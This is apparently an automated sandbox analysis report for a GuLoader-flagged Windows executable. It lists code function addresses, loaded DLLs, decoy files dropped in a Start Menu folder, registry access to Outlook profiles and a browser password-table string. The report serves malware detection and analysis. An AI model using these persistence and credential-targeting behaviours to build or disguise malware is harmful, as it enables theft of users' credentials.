            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_350045006_2_35004500
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500C9886_2_3500C988
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_350015F86_2_350015F8
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_350070486_2_35007048
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_35001C586_2_35001C58
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500E91E6_2_3500E91E
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500C5266_2_3500C526
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500E9286_2_3500E928
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500C5306_2_3500C530
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_35000D396_2_35000D39
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_35000D486_2_35000D48
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500ED706_2_3500ED70
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500C97A6_2_3500C97A
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500ED806_2_3500ED80
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500118F6_2_3500118F
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_350011A06_2_350011A0
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500F1C86_2_3500F1C8
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500CDD66_2_3500CDD6
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500F1D86_2_3500F1D8
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500CDE06_2_3500CDE0
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_350015EA6_2_350015EA
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_350000116_2_35000011
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500DC126_2_3500DC12
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500B8186_2_3500B818
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500DC206_2_3500DC20
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500B8286_2_3500B828
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_350000406_2_35000040
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_35003C426_2_35003C42
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_35001C496_2_35001C49
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_35003C506_2_35003C50
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500E0686_2_3500E068
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500BC716_2_3500BC71
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500E0786_2_3500E078
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500BC806_2_3500BC80
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_350004896_2_35000489
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_350004986_2_35000498
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_350040986_2_35004098
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_35009CA06_2_35009CA0
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_350040A86_2_350040A8
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500E4C06_2_3500E4C0
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500C0CA6_2_3500C0CA
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500E4D06_2_3500E4D0
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500C0D86_2_3500C0D8
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_350008DF6_2_350008DF
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_350008F06_2_350008F0
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_350044F06_2_350044F0
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500AB106_2_3500AB10
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500AB206_2_3500AB20
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_35002F386_2_35002F38
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_35002F486_2_35002F48
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500AF686_2_3500AF68
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500AF786_2_3500AF78
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_350033926_2_35003392
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_350033A06_2_350033A0
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500B3C16_2_3500B3C1
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500B3D06_2_3500B3D0
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_350037E86_2_350037E8
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_350037F86_2_350037F8
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500F6206_2_3500F620
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500D22E6_2_3500D22E
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500F6306_2_3500F630
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500D2386_2_3500D238
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500A2616_2_3500A261
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500A2706_2_3500A270
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500FA786_2_3500FA78
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500D6826_2_3500D682
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500FA886_2_3500FA88
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500D6906_2_3500D690
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500A6B96_2_3500A6B9
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500A6C86_2_3500A6C8
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_35002AE06_2_35002AE0
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_35002AF06_2_35002AF0
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_353016206_2_35301620
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_353033306_2_35303330
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_353039806_2_35303980
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3530981C6_2_3530981C
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_353026986_2_35302698
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_35302CE06_2_35302CE0
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_35304E486_2_35304E48
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_35304AE06_2_35304AE0
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_353016106_2_35301610
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_353033206_2_35303320
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_35303FEF6_2_35303FEF
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_353039746_2_35303974
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3530B8306_2_3530B830
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3530B8506_2_3530B850
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_353004986_2_35300498
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3530048A6_2_3530048A
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_353026186_2_35302618
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_353026876_2_35302687
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_353000126_2_35300012
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_353040006_2_35304000
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_353000406_2_35300040
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_35302CD06_2_35302CD0
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_35300B206_2_35300B20
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_385DBED86_2_385DBED8
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_385DDE706_2_385DDE70
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_385DDE606_2_385DDE60
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_385D5E306_2_385D5E30
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_385DD0886_2_385DD088
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: String function: 00402B38 appears 45 times
            Source: Hermaean.exe, 00000001.00000000.1727753600.000000000044D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametoggler triumvirates.exe4 vs Hermaean.exe
            Source: Hermaean.exe, 00000006.00000002.3012470259.0000000034F77000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Hermaean.exe
            Source: Hermaean.exe, 00000006.00000002.2987894043.000000000044D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametoggler triumvirates.exe4 vs Hermaean.exe
            Source: Hermaean.exe, 00000006.00000002.2992279228.0000000004C22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Hermaean.exe
            Source: Hermaean.exeBinary or memory string: OriginalFilenametoggler triumvirates.exe4 vs Hermaean.exe
            Source: Hermaean.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/30@5/5
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 1_2_004045C8 GetDlgItem,SetWindowTextW,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,LdrInitializeThunk,SetDlgItemTextW,1_2_004045C8
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 1_2_0040206A LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,LdrInitializeThunk,1_2_0040206A
            Source: C:\Users\user\Desktop\Hermaean.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerneJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeMutant created: NULL
            Source: C:\Users\user\Desktop\Hermaean.exeFile created: C:\Users\user\AppData\Local\Temp\nsjA4ED.tmpJump to behavior
            Source: Hermaean.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Hermaean.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Hermaean.exe, 00000006.00000002.3012907907.0000000035432000.00000004.00000800.00020000.00000000.sdmp, Hermaean.exe, 00000006.00000002.3012907907.00000000353FF000.00000004.00000800.00020000.00000000.sdmp, Hermaean.exe, 00000006.00000002.3012907907.000000003540F000.00000004.00000800.00020000.00000000.sdmp, Hermaean.exe, 00000006.00000002.3012907907.000000003541D000.00000004.00000800.00020000.00000000.sdmp, Hermaean.exe, 00000006.00000002.3013818253.000000003634D000.00000004.00000800.00020000.00000000.sdmp, Hermaean.exe, 00000006.00000002.3012907907.000000003543E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Hermaean.exeVirustotal: Detection: 72%
            Source: Hermaean.exeReversingLabs: Detection: 62%
            Source: C:\Users\user\Desktop\Hermaean.exeFile read: C:\Users\user\Desktop\Hermaean.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Hermaean.exe "C:\Users\user\Desktop\Hermaean.exe"
            Source: C:\Users\user\Desktop\Hermaean.exeProcess created: C:\Users\user\Desktop\Hermaean.exe "C:\Users\user\Desktop\Hermaean.exe"
            Source: C:\Users\user\Desktop\Hermaean.exeProcess created: C:\Users\user\Desktop\Hermaean.exe "C:\Users\user\Desktop\Hermaean.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeFile written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Udgyd.iniJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Hermaean.exeStatic file information: File size 1070325 > 1048576

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: Process Memory Space: Hermaean.exe PID: 3436, type: MEMORYSTR
            Source: Yara matchFile source: 00000001.00000002.2244389028.00000000053A2000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 1_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00406252
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 1_2_10002DB0 push eax; ret 1_2_10002DDE
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_049D6FC0 push 8BF88B6Eh; iretd 6_2_049D6FC7
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_049D68F5 push 8BF88B6Eh; iretd 6_2_049D68FC
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_35009997 push dword ptr [ebp+ecx-75h]; retf 6_2_350099A2
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_35008C74 push dword ptr [eax+ebp*8]; ret 6_2_35008C79
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_35009C77 pushfd ; iretd 6_2_35009C78
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_353090E4 push esp; retn 37B5h6_2_3530A979
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_35309AC5 push ebp; iretd 6_2_35309AC8
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_35308578 pushad ; iretd 6_2_35308586
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3530855A pushad ; iretd 6_2_3530855C
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_353085D0 pushad ; iretd 6_2_353085D6
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3530A8D0 pushad ; iretd 6_2_3530A8A3
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3530AB03 pushad ; iretd 6_2_3530AB04
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_385DD078 pushad ; retf 6_2_385DD079
            Source: C:\Users\user\Desktop\Hermaean.exeFile created: C:\Users\user\AppData\Local\Temp\nsxC682.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Hermaean.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerneJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Glorification.Ove0Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Litiscontest.jpgJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Vandbreren.Ele222Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Tiggerstavens.fesJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Udgyd.iniJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Udtrttede.iniJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\aktioners.jpgJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\begrdeliges.proJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\burdie.iniJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\cartographer.jpgJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\histographies.txtJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\icekhana.txtJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\manxman.jpgJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\modstaaet.jpgJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\musicianer.spiJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\TartarizationsJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Tartarizations\ndder.jpgJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\LiniestykkerneJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Liniestykkerne\romantiserendes.iniJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Liniestykkerne\OstrichJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Liniestykkerne\Ostrich\semiquadrangle.iniJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Liniestykkerne\Ostrich\sugarcane.jpgJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Liniestykkerne\Ostrich\tinkle.jpgJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Liniestykkerne\Ostrich\unagitatedness.txtJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
